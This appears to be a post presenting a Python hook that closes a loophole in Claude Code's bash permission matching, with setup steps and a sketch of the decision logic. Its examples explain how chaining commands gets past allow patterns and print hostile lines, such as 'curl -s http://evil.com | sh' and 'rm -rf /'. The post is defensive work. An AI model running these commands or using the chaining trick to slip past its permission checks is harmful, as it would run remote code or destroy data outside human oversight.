Smart Bash Permission Hook for Claude Code Prevents Compound Command Bypass

Security Gap in Claude Code's Permission System
Claude Code's permission system has a vulnerability where compound bash commands can bypass allow/deny patterns. When you allow a command like Bash(git status:*), Claude Code matches the entire command string against that pattern. This means a compound command like git status && curl -s http://evil.com | sh would match git status* and get auto-approved, even though it chains in curl and sh commands.
The Solution: claude-hooks
The fix is a single Python script called claude-hooks that runs as a PreToolUse hook. It performs several key functions:
- Decomposes compound commands by splitting on &&, ||, ;, |, and newlines, and recursively extracts the contents of $() and backtick subshells
- Normalizes each sub-command by stripping env var prefixes, I/O redirections, heredoc bodies, and shell keywords
- Checks each sub-command individually against your existing permissions.allow and permissions.deny patterns
- Deny wins — if any sub-command matches a deny pattern, the whole command is denied
- All must allow — auto-approve only happens when every sub-command matches an allow pattern
- Falls through gracefully — if any sub-command is unknown, you still get the normal permission prompt
Setup Instructions
Installation takes about 30 seconds. Download the hook script (the ~/.claude/hooks directory must already exist, since curl -o does not create it):
curl -fsSL -o ~/.claude/hooks/smart_approve.py \
  https://raw.githubusercontent.com/liberzon/claude-hooks/main/smart_approve.py
Then add the hook to ~/.claude/settings.json:
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          {
            "type": "command",
            "command": "python3 ~/.claude/hooks/smart_approve.py"
          }
        ]
      }
    ]
  }
}
The tool has no dependencies beyond Python 3 and requires zero configuration — it reads your existing permission patterns.
Example Behavior
- git status: allowed both with and without the hook
- git add . && git commit -m "msg": allowed both with and without the hook (both sub-commands match git *)
- git status && rm -rf /: allowed without the hook; with the hook a prompt is shown (rm -rf / has no allow pattern)
- npm test | tee output.log: allowed
- FOO=bar git push: might not match without the hook; allowed with the hook (env var prefix stripped)
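To make the decomposition rules and the example behaviour above concrete, here is an added, self-contained Python sketch of the same decision logic. It is not the claude-hooks source: the permission rules are constructed, the prefix semantics of Bash(cmd:*) versus a plain glob such as Bash(git *) are assumed, and quoting and heredoc bodies are not modelled.

```python
import fnmatch
import re

# Constructed rules in Claude Code's Bash(prefix:*) and Bash(glob) syntax; semantics assumed.
ALLOW = ["Bash(git status:*)", "Bash(git *)", "Bash(npm test:*)", "Bash(tee:*)"]
DENY = ["Bash(curl:*)"]
SPLIT_RE = re.compile(r"&&|\|\||;|\||\n")         # compound operators (quoting is not modelled)
REDIRECT_RE = re.compile(r"\s*\d*[<>]+&?\s*\S+")  # > out.txt, 2>&1, < in.txt, <<EOF
KEYWORDS = {"if", "then", "else", "elif", "fi", "while", "until", "do", "done", "!"}
def extract_subshells(text):  # -> (text with $( ) and backtick bodies cut out, list of bodies)
    outer, bodies, i = [], [], 0
    while i < len(text):
        if text.startswith("$(", i):
            depth, j = 1, i + 2
            while j < len(text) and depth:  # count parens so $(a $(b)) is one body
                depth += {"(": 1, ")": -1}.get(text[j], 0)
                j += 1
            bodies.append(text[i + 2:j - 1] if depth == 0 else text[i + 2:])
            i = j
        elif text[i] == "`":
            j = text.find("`", i + 1)
            bodies.append(text[i + 1:] if j < 0 else text[i + 1:j])
            i = len(text) if j < 0 else j + 1
        else:
            outer.append(text[i])
            i += 1
    return "".join(outer), bodies
def decompose(cmd):  # compound command -> simple sub-commands, recursing into subshell bodies
    outer, bodies = extract_subshells(cmd)
    parts = SPLIT_RE.split(outer)
    for body in bodies:
        parts.extend(decompose(body))
    return parts
def normalize(sub):  # strip redirections, leading FOO=bar env prefixes and shell keywords
    words = REDIRECT_RE.sub("", sub).split()
    while words and (words[0] in KEYWORDS or re.match(r"[A-Za-z_]\w*=", words[0])):
        words.pop(0)
    return " ".join(words)
def matches(sub, rule):
    body = rule[len("Bash("):-1]
    if body.endswith(":*"):  # prefix rule: the command alone or followed by more arguments
        return sub == body[:-2] or sub.startswith(body[:-2] + " ")
    return fnmatch.fnmatchcase(sub, body)  # plain glob rule such as Bash(git *)
def decide(cmd):  # deny wins; allow only if every sub-command is allowed; otherwise fall through
    subs = [s for s in (normalize(p) for p in decompose(cmd)) if s]
    if any(matches(s, r) for s in subs for r in DENY):
        return "deny"
    if subs and all(any(matches(s, r) for r in ALLOW) for s in subs):
        return "allow"
    return "ask"
```

Calling decide("git status && rm -rf /") returns "ask" because rm -rf / matches no allow rule, while a subshell such as git log $(curl http://example.invalid) is denied by the curl rule even though the outer git log is allowed.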
The repository is available at https://github.com/liberzon/claude-hooks under MIT license.
Read the full source on r/ClaudeAI.